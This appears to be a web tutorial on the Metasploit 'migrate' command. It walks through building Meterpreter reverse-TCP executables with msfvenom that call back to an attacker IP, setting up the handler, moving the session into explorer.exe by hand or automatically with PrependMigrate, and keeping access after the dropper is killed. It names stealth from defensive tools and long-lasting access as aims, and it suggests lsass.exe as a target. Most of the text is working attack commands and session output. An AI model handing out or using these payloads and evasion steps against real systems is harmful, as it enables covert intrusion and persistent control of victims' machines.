Unlock cybersecurity expertise, protect digital frontiers, secure your future today! Join Now
Home
Cyber Security

Metasploit : The migrate Command

Metasploit : The migrate Command

Table of Contents

Why Use migrate

Reasons to Migrate:

  • Stability: Initial processes like cmd.exe or geek.exe may terminate.
  • Stealth: Defensive tools monitor suspicious processes.
  • Compatibility: You may need to shift from x86 to x64 environments or vice versa.

The migrate command helps by relocating your Meterpreter session to a more appropriate process like explorer.exe.

Payload Generation (Without Migration)

Generate a basic Meterpreter reverse shell:

msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 \
-f exe -o geek.exe
  • LHOST: Your attack machine’s IP.
  • LPORT: Listening port.
  • Output: geek.exe will be the executable you deliver to the victim.

Setting Up the Listener

Start Metasploit and configure the handler:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

Wait for the victim to run geek.exe.

Manual Migration by Process Name and PID

Once the payload is executed and you gain a session:

[*] Meterpreter session 1 opened

Step 1: List Running Processes

meterpreter> ps

Example output:

 PID   Name
 ----  ---------------
 5200  explorer.exe
 7088  geek.exe

Step 2: Migrate Using Process Name

meterpreter> migrate -N explorer.exe

Step 3: Verify Current Process

meterpreter> getpid
Current PID: 5200

Step 4: Confirm Original Process is Gone

meterpreter> ps | grep geek.exe
(No results – successful migration!)

Migrating Using Process ID (Alternative)

meterpreter> migrate 5200
meterpreter> getpid

Auto-Migration with PrependMigrate

Step 1: Create Payload That Auto-Migrates

msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.100 LPORT=4444 \
PrependMigrate=true \
PrependMigrateProcess=explorer.exe \
-f exe -o auto_geek.exe

Step 2: Configure Handler Again

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

Step 3: Check Migration Success

meterpreter> getpid
Current PID: 5200
meterpreter> ps | grep auto_geek.exe
(No results – auto-migration successful)

Testing Persistence After Kill

Step 1: Find Original Payload Process

meterpreter> ps | grep auto_geek.exe

Assume PID is 8064.

Step 2: Kill It

meterpreter> kill 8064

Step 3: Check Session Still Works

meterpreter> sysinfo
Computer        : VICTIM-PC
OS              : Windows 10 (Build 19044).
Architecture    : x64
Meterpreter     : x86/windows

If the session is still active, migration worked!

Conclusion

The migrate command is essential for long-lasting access and stealth in a post-exploitation environment. You can:

  • Migrate manually to trusted processes.
  • Use PrependMigrate for stealth automation.
  • Retain sessions even after the original dropper is killed.

Recommended Process Targets

  • explorer.exe: Always running and stable.
  • svchost.exe: Common and trusted.
  • winlogon.exe or lsass.exe: Powerful but use with elevated privileges.